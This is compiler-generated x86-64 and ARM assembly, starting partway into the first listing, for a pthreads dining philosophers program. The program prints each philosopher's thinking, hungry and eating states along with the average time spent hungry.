ecx, eax mov rax, QWORD PTR -56[rbp] mov edx, DWORD PTR [rax] mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] mov r8, rbx mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov rax, QWORD PTR -48[rbp] mov rdi, rax call pthread_mutex_lock@PLT .L14: mov rax, QWORD PTR -40[rbp] mov rdi, rax call pthread_mutex_trylock@PLT mov DWORD PTR -60[rbp], eax cmp DWORD PTR -60[rbp], 0 je .L15 mov eax, 0 call Current_Time mov r12, rax mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] mov edi, eax call next mov ebx, eax mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] mov edi, eax call next mov edx, eax mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] mov r8, r12 mov ecx, ebx mov esi, eax lea rdi, .LC4[rip] mov eax, 0 call printf@PLT mov rax, QWORD PTR -40[rbp] mov rdi, rax call pthread_mutex_lock@PLT .L15: mov edi, 0 call time@PLT mov QWORD PTR -24[rbp], rax mov rax, QWORD PTR -56[rbp] movsd xmm1, QWORD PTR 40[rax] movsd QWORD PTR -96[rbp], xmm1 mov rdx, QWORD PTR -32[rbp] mov rax, QWORD PTR -24[rbp] mov rsi, rdx mov rdi, rax call difftime@PLT addsd xmm0, QWORD PTR -96[rbp] mov rax, QWORD PTR -56[rbp] movsd QWORD PTR 40[rax], xmm0 mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR 48[rax] lea edx, 1[rax] mov rax, QWORD PTR -56[rbp] mov DWORD PTR 48[rax], edx mov eax, 0 call Current_Time mov rdx, rax mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] mov esi, eax lea rdi, .LC5[rip] mov eax, 0 call printf@PLT mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR 52[rax] mov edi, eax call sleep@PLT mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] add DWORD PTR -68[rbp], eax mov rax, QWORD PTR -40[rbp] mov rdi, rax call pthread_mutex_unlock@PLT mov rax, QWORD PTR -48[rbp] mov rdi, rax call pthread_mutex_unlock@PLT .L13: cmp DWORD PTR -68[rbp], 20 jle .L16 mov eax, 0 call Current_Time mov rdx, rax mov rax, QWORD PTR -56[rbp] mov eax, DWORD PTR [rax] mov esi, eax lea rdi, .LC6[rip] mov eax, 0 call printf@PLT mov rax, QWORD PTR -56[rbp] mov DWORD PTR 32[rax], 1 mov eax, 0 add rsp, 80 pop rbx pop r12 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size Philosopher_Meal, .-Philosopher_Meal .section .rodata .align 8 .LC8: .string "All Philosophers are FULL now " .align 8 .LC9: .string "The average time of all Philosophers being HUNGRY is %f seconds. \n" .text .globl Philosophers_Problem .type Philosophers_Problem, @function Philosophers_Problem: .LFB11: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push r13 push r12 push rbx sub rsp, 104 .cfi_offset 13, -24 .cfi_offset 12, -32 .cfi_offset 3, -40 mov DWORD PTR -116[rbp], edi mov rsi, QWORD PTR fs:40 mov QWORD PTR -40[rbp], rsi xor esi, esi mov rsi, rsp mov r13, rsi mov esi, DWORD PTR -116[rbp] movsx rdi, esi sub rdi, 1 mov QWORD PTR -80[rbp], rdi movsx rdi, esi mov rax, rdi mov edx, 0 imul r12, rdx, 320 imul rdi, rax, 0 add rdi, r12 mov r12d, 320 mul r12 add rdi, rdx mov rdx, rdi movsx rdx, esi mov rax, rdx sal rax, 2 add rax, rdx sal rax, 3 movsx rax, esi mov r10, rax mov r11d, 0 imul rdx, r11, 320 imul rax, r10, 0 lea rdi, [rdx+rax] mov eax, 320 mul r10 add rdi, rdx mov rdx, rdi movsx rdx, esi mov rax, rdx sal rax, 2 add rax, rdx sal rax, 3 mov rdx, rax mov eax, 16 sub rax, 1 add rax, rdx mov esi, 16 mov edx, 0 div rsi imul rax, rax, 16 mov rsi, rax and rsi, -4096 mov rdx, rsp sub rdx, rsi .L19: cmp rsp, rdx je .L20 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L19 .L20: mov rdx, rax and edx, 4095 sub rsp, rdx mov rdx, rax and edx, 4095 test rdx, rdx je .L21 and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L21: mov rax, rsp add rax, 7 shr rax, 3 sal rax, 3 mov QWORD PTR -72[rbp], rax mov esi, DWORD PTR -116[rbp] movsx rax, esi sub rax, 1 mov QWORD PTR -64[rbp], rax movsx rax, esi mov r8, rax mov r9d, 0 imul rdx, r9, 448 imul rax, r8, 0 lea rdi, [rdx+rax] mov eax, 448 mul r8 add rdi, rdx mov rdx, rdi movsx rdx, esi mov rax, rdx sal rax, 3 sub rax, rdx sal rax, 3 movsx rax, esi mov rcx, rax mov ebx, 0 imul rdx, rbx, 448 imul rax, rcx, 0 lea rdi, [rdx+rax] mov eax, 448 mul rcx lea rcx, [rdi+rdx] mov rdx, rcx movsx rdx, esi mov rax, rdx sal rax, 3 sub rax, rdx sal rax, 3 mov rdx, rax mov eax, 16 sub rax, 1 add rax, rdx mov ebx, 16 mov edx, 0 div rbx imul rax, rax, 16 mov rcx, rax and rcx, -4096 mov rdx, rsp sub rdx, rcx .L22: cmp rsp, rdx je .L23 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L22 .L23: mov rdx, rax and edx, 4095 sub rsp, rdx mov rdx, rax and edx, 4095 test rdx, rdx je .L24 and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L24: mov rax, rsp add rax, 7 shr rax, 3 sal rax, 3 mov QWORD PTR -56[rbp], rax mov DWORD PTR -92[rbp], 0 jmp .L25 .L26: mov eax, DWORD PTR -92[rbp] movsx rdx, eax mov rax, rdx sal rax, 2 add rax, rdx sal rax, 3 mov rdx, QWORD PTR -72[rbp] add rax, rdx mov esi, 0 mov rdi, rax call pthread_mutex_init@PLT add DWORD PTR -92[rbp], 1 .L25: mov eax, DWORD PTR -92[rbp] cmp eax, DWORD PTR -116[rbp] jl .L26 mov DWORD PTR -92[rbp], 0 jmp .L27 .L28: mov eax, DWORD PTR -92[rbp] movsx rdx, eax mov rax, rdx sal rax, 3 sub rax, rdx sal rax, 3 mov rdx, QWORD PTR -56[rbp] add rax, rdx mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -48[rbp] pxor xmm0, xmm0 movsd QWORD PTR 40[rax], xmm0 mov rax, QWORD PTR -48[rbp] mov DWORD PTR 48[rax], 0 mov rax, QWORD PTR -48[rbp] mov DWORD PTR 32[rax], 0 mov eax, DWORD PTR -92[rbp] lea edx, 1[rax] mov rax, QWORD PTR -48[rbp] mov DWORD PTR [rax], edx mov eax, DWORD PTR -92[rbp] movsx rdx, eax mov rax, rdx sal rax, 2 add rax, rdx sal rax, 3 mov rdx, QWORD PTR -72[rbp] add rdx, rax mov rax, QWORD PTR -48[rbp] mov QWORD PTR 16[rax], rdx mov eax, DWORD PTR -92[rbp] add eax, 1 cdq idiv DWORD PTR -116[rbp] mov eax, edx movsx rdx, eax mov rax, rdx sal rax, 2 add rax, rdx sal rax, 3 mov rdx, QWORD PTR -72[rbp] add rdx, rax mov rax, QWORD PTR -48[rbp] mov QWORD PTR 24[rax], rdx call rand@PLT movsx rdx, eax imul rdx, rdx, 1431655766 shr rdx, 32 mov ecx, eax sar ecx, 31 sub edx, ecx mov ecx, edx add ecx, ecx add ecx, edx sub eax, ecx mov edx, eax add edx, 1 mov rax, QWORD PTR -48[rbp] mov DWORD PTR 52[rax], edx mov rax, QWORD PTR -48[rbp] lea rdi, 8[rax] mov rax, QWORD PTR -48[rbp] mov rcx, rax lea rdx, Philosopher_Meal[rip] mov esi, 0 call pthread_create@PLT add DWORD PTR -92[rbp], 1 .L27: mov eax, DWORD PTR -92[rbp] cmp eax, DWORD PTR -116[rbp] jl .L28 mov DWORD PTR -96[rbp], 1 jmp .L29 .L37: mov DWORD PTR -100[rbp], 0 mov DWORD PTR -92[rbp], 0 jmp .L30 .L32: mov eax, DWORD PTR -92[rbp] movsx rdx, eax mov rax, rdx sal rax, 3 sub rax, rdx sal rax, 3 mov rdx, QWORD PTR -56[rbp] add rax, rdx mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -48[rbp] mov eax, DWORD PTR 32[rax] test eax, eax je .L31 add DWORD PTR -100[rbp], 1 .L31: add DWORD PTR -92[rbp], 1 .L30: mov eax, DWORD PTR -92[rbp] cmp eax, DWORD PTR -116[rbp] jl .L32 mov eax, DWORD PTR -100[rbp] cmp eax, DWORD PTR -116[rbp] jne .L29 mov DWORD PTR -92[rbp], 0 jmp .L33 .L34: mov eax, DWORD PTR -92[rbp] movsx rdx, eax mov rax, rdx sal rax, 3 sub rax, rdx sal rax, 3 mov rdx, QWORD PTR -56[rbp] add rax, rdx mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -48[rbp] mov rax, QWORD PTR 8[rax] mov esi, 0 mov rdi, rax call pthread_join@PLT add DWORD PTR -92[rbp], 1 .L33: mov eax, DWORD PTR -92[rbp] cmp eax, DWORD PTR -116[rbp] jl .L34 lea rdi, .LC8[rip] call puts@PLT mov DWORD PTR -92[rbp], 0 jmp .L35 .L36: mov eax, DWORD PTR -92[rbp] movsx rdx, eax mov rax, rdx sal rax, 2 add rax, rdx sal rax, 3 mov rdx, QWORD PTR -72[rbp] add rax, rdx mov rdi, rax call pthread_mutex_destroy@PLT mov eax, DWORD PTR -92[rbp] movsx rdx, eax mov rax, rdx sal rax, 3 sub rax, rdx sal rax, 3 mov rdx, QWORD PTR -56[rbp] add rax, rdx mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -48[rbp] mov rcx, QWORD PTR 40[rax] mov rax, QWORD PTR -48[rbp] mov edx, DWORD PTR 48[rax] mov rax, QWORD PTR -48[rbp] mov eax, DWORD PTR [rax] movq xmm0, rcx mov esi, edx mov edi, eax call ready_time_average movsd xmm1, QWORD PTR -88[rbp] addsd xmm0, xmm1 movsd QWORD PTR -88[rbp], xmm0 add DWORD PTR -92[rbp], 1 .L35: mov eax, DWORD PTR -92[rbp] cmp eax, DWORD PTR -116[rbp] jl .L36 pxor xmm1, xmm1 cvtsi2sd xmm1, DWORD PTR -116[rbp] movsd xmm0, QWORD PTR -88[rbp] divsd xmm0, xmm1 movq rax, xmm0 movq xmm0, rax lea rdi, .LC9[rip] mov eax, 1 call printf@PLT mov DWORD PTR -96[rbp], 0 .L29: cmp DWORD PTR -96[rbp], 0 jne .L37 mov rsp, r13 nop mov rax, QWORD PTR -40[rbp] sub rax, QWORD PTR fs:40 je .L38 call __stack_chk_fail@PLT .L38: lea rsp, -24[rbp] pop rbx pop r12 pop r13 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE11: .size Philosophers_Problem, .-Philosophers_Problem .section .rodata .align 8 .LC10: .string "Enter the number of Philosophers to dine! Number must be between 3 and 10: " .LC11: .string "%d" .text .globl main .type main, @function main: .LFB12: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR philosophers[rip], 0 jmp .L40 .L41: lea rdi, .LC10[rip] mov eax, 0 call printf@PLT lea rsi, philosophers[rip] lea rdi, .LC11[rip] mov eax, 0 call __isoc99_scanf@PLT .L40: mov eax, DWORD PTR philosophers[rip] cmp eax, 10 jg .L41 mov eax, DWORD PTR philosophers[rip] cmp eax, 2 jle .L41 mov eax, DWORD PTR philosophers[rip] mov edi, eax call Philosophers_Problem mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE12: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "171213.c" .text .comm philosophers,4,4 .global __aeabi_idivmod .align 2 .global next .syntax unified .arm .fpu softvfp .type next, %function next: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] ldr r3, [fp, #-16] add r3, r3, #1 ldr r2, .L4 ldr r2, [r2] mov r1, r2 mov r0, r3 bl __aeabi_idivmod mov r3, r1 str r3, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 bne .L2 ldr r3, .L4 ldr r3, [r3] str r3, [fp, #-8] .L2: ldr r3, [fp, #-8] mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L5: .align 2 .L4: .word philosophers .size next, .-next .align 2 .global previous .syntax unified .arm .fpu softvfp .type previous, %function previous: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] ldr r3, [fp, #-16] sub r3, r3, #1 ldr r2, .L9 ldr r2, [r2] mov r1, r2 mov r0, r3 bl __aeabi_idivmod mov r3, r1 str r3, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 bne .L7 ldr r3, .L9 ldr r3, [r3] str r3, [fp, #-8] .L7: ldr r3, [fp, #-8] mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L10: .align 2 .L9: .word philosophers .size previous, .-previous .global __aeabi_i2d .global __aeabi_ddiv .section .rodata .align 2 .LC0: .ascii "Philosopher %d was HUNGRY on average for %f seconds" .ascii ". \012\000" .text .align 2 .global ready_time_average .syntax unified .arm .fpu softvfp .type ready_time_average, %function ready_time_average: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-8] str r1, [fp, #-12] str r2, [fp, #-20] str r3, [fp, #-16] ldr r0, [fp, #-12] bl __aeabi_i2d mov r2, r0 mov r3, r1 sub r1, fp, #20 ldmia r1, {r0-r1} bl __aeabi_ddiv mov r2, r0 mov r3, r1 ldr r1, [fp, #-8] ldr r0, .L13 bl printf ldr r0, [fp, #-12] bl __aeabi_i2d mov r2, r0 mov r3, r1 sub r1, fp, #20 ldmia r1, {r0-r1} bl __aeabi_ddiv mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L14: .align 2 .L13: .word .LC0 .size ready_time_average, .-ready_time_average .section .rodata .align 2 .LC1: .word __stack_chk_guard .text .align 2 .global Current_Time .syntax unified .arm .fpu softvfp .type Current_Time, %function Current_Time: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 ldr r3, .L18 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r0, #0 bl time mov r3, r0 str r3, [fp, #-12] sub r3, fp, #12 mov r0, r3 bl ctime mov r3, r0 ldr r2, .L18 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L17 bl __stack_chk_fail .L17: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L19: .align 2 .L18: .word .LC1 .size Current_Time, .-Current_Time .section .rodata .align 2 .LC2: .ascii "Philosopher %d is THINKING at %s \012\000" .align 2 .LC3: .ascii "Philosopher %d is HUNGRY at %s \012\000" .align 2 .LC4: .ascii "Philosopher %d failed to take fork %d , because phi" .ascii "losopher %d was eating at %s \012\000" .align 2 .LC5: .ascii "Philosopher %d failed to take fork %d , because phi" .ascii "losopher %d was eating at %s \012\000" .global __aeabi_dadd .align 2 .LC6: .ascii "Philosopher %d is EATING at %s \012\000" .align 2 .LC7: .ascii "Philosopher %d is FULL and LEAVES the table at %s " .ascii "\012\000" .text .align 2 .global Philosopher_Meal .syntax unified .arm .fpu softvfp .type Philosopher_Meal, %function Philosopher_Meal: @ args = 0, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, fp, lr} add fp, sp, #16 sub sp, sp, #52 str r0, [fp, #-56] ldr r3, [fp, #-56] str r3, [fp, #-48] mov r3, #0 str r3, [fp, #-52] b .L21 .L24: ldr r3, [fp, #-48] ldr r4, [r3] bl Current_Time mov r3, r0 mov r2, r3 mov r1, r4 ldr r0, .L26 bl printf bl rand mov r1, r0 ldr r3, .L26+4 smull r2, r3, r1, r3 asr r2, r3, #2 asr r3, r1, #31 sub r2, r2, r3 mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r3, r3, #1 sub r2, r1, r3 add r3, r2, #1 mov r0, r3 bl sleep ldr r3, [fp, #-48] ldr r3, [r3, #8] str r3, [fp, #-44] ldr r3, [fp, #-48] ldr r3, [r3, #12] str r3, [fp, #-40] ldr r3, [fp, #-48] ldr r4, [r3] bl Current_Time mov r3, r0 mov r2, r3 mov r1, r4 ldr r0, .L26+8 bl printf mov r0, #0 bl time str r0, [fp, #-36] ldr r0, [fp, #-44] bl pthread_mutex_trylock str r0, [fp, #-32] ldr r3, [fp, #-32] cmp r3, #0 beq .L22 ldr r3, [fp, #-48] ldr r4, [r3] ldr r3, [fp, #-48] ldr r5, [r3] ldr r3, [fp, #-48] ldr r3, [r3] mov r0, r3 bl previous mov r6, r0 bl Current_Time mov r3, r0 str r3, [sp] mov r3, r6 mov r2, r5 mov r1, r4 ldr r0, .L26+12 bl printf ldr r0, [fp, #-44] bl pthread_mutex_lock .L22: ldr r0, [fp, #-40] bl pthread_mutex_trylock str r0, [fp, #-28] ldr r3, [fp, #-28] cmp r3, #0 beq .L23 ldr r3, [fp, #-48] ldr r4, [r3] ldr r3, [fp, #-48] ldr r3, [r3] mov r0, r3 bl next mov r5, r0 ldr r3, [fp, #-48] ldr r3, [r3] mov r0, r3 bl next mov r6, r0 bl Current_Time mov r3, r0 str r3, [sp] mov r3, r6 mov r2, r5 mov r1, r4 ldr r0, .L26+16 bl printf ldr r0, [fp, #-40] bl pthread_mutex_lock .L23: mov r0, #0 bl time str r0, [fp, #-24] ldr r3, [fp, #-48] add r5, r3, #24 ldmia r5, {r4-r5} ldr r1, [fp, #-36] ldr r0, [fp, #-24] bl difftime mov r2, r0 mov r3, r1 mov r0, r4 mov r1, r5 bl __aeabi_dadd mov r2, r0 mov r3, r1 ldr r1, [fp, #-48] str r2, [r1, #24] str r3, [r1, #28] ldr r3, [fp, #-48] ldr r3, [r3, #32] add r2, r3, #1 ldr r3, [fp, #-48] str r2, [r3, #32] ldr r3, [fp, #-48] ldr r4, [r3] bl Current_Time mov r3, r0 mov r2, r3 mov r1, r4 ldr r0, .L26+20 bl printf ldr r3, [fp, #-48] ldr r3, [r3, #36] mov r0, r3 bl sleep ldr r3, [fp, #-48] ldr r3, [r3] ldr r2, [fp, #-52] add r3, r2, r3 str r3, [fp, #-52] ldr r0, [fp, #-40] bl pthread_mutex_unlock ldr r0, [fp, #-44] bl pthread_mutex_unlock .L21: ldr r3, [fp, #-52] cmp r3, #20 ble .L24 ldr r3, [fp, #-48] ldr r4, [r3] bl Current_Time mov r3, r0 mov r2, r3 mov r1, r4 ldr r0, .L26+24 bl printf ldr r3, [fp, #-48] mov r2, #1 str r2, [r3, #16] mov r3, #0 mov r0, r3 sub sp, fp, #16 @ sp needed pop {r4, r5, r6, fp, pc} .L27: .align 2 .L26: .word .LC2 .word 1717986919 .word .LC3 .word .LC4 .word .LC5 .word .LC6 .word .LC7 .size Philosopher_Meal, .-Philosopher_Meal .section .rodata .align 2 .LC8: .ascii "All Philosophers are FULL now \000" .align 2 .LC9: .ascii "The average time of all Philosophers being HUNGRY i" .ascii "s %f seconds. \012\000" .align 2 .LC10: .word __stack_chk_guard .text .align 2 .global Philosophers_Problem .syntax unified .arm .fpu softvfp .type Philosophers_Problem, %function Philosophers_Problem: @ args = 0, pretend = 0, frame = 56 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, fp, lr} add fp, sp, #24 sub sp, sp, #60 str r0, [fp, #-80] ldr r3, .L43 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 mov r3, sp mov r8, r3 ldr ip, [fp, #-80] sub r3, ip, #1 str r3, [fp, #-64] mov r3, ip mov r0, r3 mov r1, #0 mov r2, r0 mov r3, r1 adds r6, r2, r2 adc r7, r3, r3 mov r2, r6 mov r3, r7 adds r2, r2, r0 adc r3, r3, r1 mov r0, #0 mov r1, #0 lsl r1, r3, #6 orr r1, r1, r2, lsr #26 lsl r0, r2, #6 mov r2, r0 mov r3, r1 mov r2, ip mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #3 mov r3, ip mov r0, r3 mov r1, #0 mov r2, r0 mov r3, r1 adds r4, r2, r2 adc r5, r3, r3 mov r2, r4 mov r3, r5 adds r2, r2, r0 adc r3, r3, r1 mov r0, #0 mov r1, #0 lsl r1, r3, #6 orr r1, r1, r2, lsr #26 lsl r0, r2, #6 mov r2, r0 mov r3, r1 mov r2, ip mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #3 add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 sub sp, sp, r3 mov r3, sp add r3, r3, #3 lsr r3, r3, #2 lsl r3, r3, #2 str r3, [fp, #-60] ldr ip, [fp, #-80] sub r3, ip, #1 str r3, [fp, #-56] mov r3, ip mov r4, r3 mov r5, #0 mov r2, r4 mov r3, r5 mov r0, #0 mov r1, #0 lsl r1, r3, #2 orr r1, r1, r2, lsr #30 lsl r0, r2, #2 mov r2, r0 mov r3, r1 adds r2, r2, r4 adc r3, r3, r5 mov r0, #0 mov r1, #0 lsl r1, r3, #6 orr r1, r1, r2, lsr #26 lsl r0, r2, #6 mov r2, r0 mov r3, r1 mov r2, ip mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r3, r3, #3 mov r3, ip mov r4, r3 mov r5, #0 mov r2, r4 mov r3, r5 mov r0, #0 mov r1, #0 lsl r1, r3, #2 orr r1, r1, r2, lsr #30 lsl r0, r2, #2 mov r2, r0 mov r3, r1 adds r2, r2, r4 adc r3, r3, r5 mov r0, #0 mov r1, #0 lsl r1, r3, #6 orr r1, r1, r2, lsr #26 lsl r0, r2, #6 mov r2, r0 mov r3, r1 mov r2, ip mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r3, r3, #3 add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 sub sp, sp, r3 mov r3, sp add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 str r3, [fp, #-52] mov r3, #0 str r3, [fp, #-68] b .L29 .L30: ldr r2, [fp, #-68] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #3 ldr r2, [fp, #-60] add r3, r2, r3 mov r1, #0 mov r0, r3 bl pthread_mutex_init ldr r3, [fp, #-68] add r3, r3, #1 str r3, [fp, #-68] .L29: ldr r2, [fp, #-68] ldr r3, [fp, #-80] cmp r2, r3 blt .L30 mov r3, #0 str r3, [fp, #-68] b .L31 .L32: ldr r2, [fp, #-68] mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r3, r3, #3 ldr r2, [fp, #-52] add r3, r2, r3 str r3, [fp, #-48] ldr r1, [fp, #-48] mov r2, #0 mov r3, #0 str r2, [r1, #24] str r3, [r1, #28] ldr r3, [fp, #-48] mov r2, #0 str r2, [r3, #32] ldr r3, [fp, #-48] mov r2, #0 str r2, [r3, #16] ldr r3, [fp, #-68] add r2, r3, #1 ldr r3, [fp, #-48] str r2, [r3] ldr r2, [fp, #-68] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #3 ldr r2, [fp, #-60] add r2, r2, r3 ldr r3, [fp, #-48] str r2, [r3, #8] ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-80] mov r0, r3 bl __aeabi_idivmod mov r3, r1 mov r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #3 ldr r2, [fp, #-60] add r2, r2, r3 ldr r3, [fp, #-48] str r2, [r3, #12] bl rand mov r1, r0 ldr r3, .L43+4 smull r0, r2, r3, r1 asr r3, r1, #31 sub r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 sub r2, r1, r3 add r2, r2, #1 ldr r3, [fp, #-48] str r2, [r3, #36] ldr r3, [fp, #-48] add r0, r3, #4 ldr r3, [fp, #-48] ldr r2, .L43+8 mov r1, #0 bl pthread_create ldr r3, [fp, #-68] add r3, r3, #1 str r3, [fp, #-68] .L31: ldr r2, [fp, #-68] ldr r3, [fp, #-80] cmp r2, r3 blt .L32 mov r3, #1 str r3, [fp, #-72] b .L33 .L41: mov r3, #0 str r3, [fp, #-76] mov r3, #0 str r3, [fp, #-68] b .L34 .L36: ldr r2, [fp, #-68] mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r3, r3, #3 ldr r2, [fp, #-52] add r3, r2, r3 str r3, [fp, #-48] ldr r3, [fp, #-48] ldr r3, [r3, #16] cmp r3, #0 beq .L35 ldr r3, [fp, #-76] add r3, r3, #1 str r3, [fp, #-76] .L35: ldr r3, [fp, #-68] add r3, r3, #1 str r3, [fp, #-68] .L34: ldr r2, [fp, #-68] ldr r3, [fp, #-80] cmp r2, r3 blt .L36 ldr r2, [fp, #-76] ldr r3, [fp, #-80] cmp r2, r3 bne .L33 mov r3, #0 str r3, [fp, #-68] b .L37 .L38: ldr r2, [fp, #-68] mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r3, r3, #3 ldr r2, [fp, #-52] add r3, r2, r3 str r3, [fp, #-48] ldr r3, [fp, #-48] ldr r3, [r3, #4] mov r1, #0 mov r0, r3 bl pthread_join ldr r3, [fp, #-68] add r3, r3, #1 str r3, [fp, #-68] .L37: ldr r2, [fp, #-68] ldr r3, [fp, #-80] cmp r2, r3 blt .L38 ldr r0, .L43+12 bl puts mov r3, #0 str r3, [fp, #-68] b .L39 .L40: ldr r2, [fp, #-68] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #3 ldr r2, [fp, #-60] add r3, r2, r3 mov r0, r3 bl pthread_mutex_destroy ldr r2, [fp, #-68] mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r3, r3, #3 ldr r2, [fp, #-52] add r3, r2, r3 str r3, [fp, #-48] ldr r3, [fp, #-48] ldr r0, [r3] ldr r3, [fp, #-48] ldr r1, [r3, #32] ldr r3, [fp, #-48] add r3, r3, #24 ldmia r3, {r2-r3} bl ready_time_average mov r2, r0 mov r3, r1 sub r1, fp, #44 ldmia r1, {r0-r1} bl __aeabi_dadd mov r2, r0 mov r3, r1 str r2, [fp, #-44] str r3, [fp, #-40] ldr r3, [fp, #-68] add r3, r3, #1 str r3, [fp, #-68] .L39: ldr r2, [fp, #-68] ldr r3, [fp, #-80] cmp r2, r3 blt .L40 ldr r0, [fp, #-80] bl __aeabi_i2d mov r2, r0 mov r3, r1 sub r1, fp, #44 ldmia r1, {r0-r1} bl __aeabi_ddiv mov r2, r0 mov r3, r1 ldr r0, .L43+16 bl printf mov r3, #0 str r3, [fp, #-72] .L33: ldr r3, [fp, #-72] cmp r3, #0 bne .L41 mov sp, r8 nop ldr r3, .L43 ldr r2, [r3] ldr r3, [fp, #-32] eors r2, r3, r2 mov r3, #0 beq .L42 bl __stack_chk_fail .L42: sub sp, fp, #24 @ sp needed pop {r4, r5, r6, r7, r8, fp, pc} .L44: .align 2 .L43: .word .LC10 .word 1431655766 .word Philosopher_Meal .word .LC8 .word .LC9 .size Philosophers_Problem, .-Philosophers_Problem .section .rodata .align 2 .LC11: .ascii "Enter the number of Philosophers to dine! Number mu" .ascii "st be between 3 and 10: \000" .align 2 .LC12: .ascii "%d\000" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 ldr r3, .L49 mov r2, #0 str r2, [r3] b .L46 .L47: ldr r0, .L49+4 bl printf ldr r1, .L49 ldr r0, .L49+8 bl __isoc99_scanf .L46: ldr r3, .L49 ldr r3, [r3] cmp r3, #10 bgt .L47 ldr r3, .L49 ldr r3, [r3] cmp r3, #2 ble .L47 ldr r3, .L49 ldr r3, [r3] mov r0, r3 bl Philosophers_Problem mov r3, #0 mov r0, r3 pop {fp, pc} .L50: .align 2 .L49: .word philosophers .word .LC11 .word .LC12 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
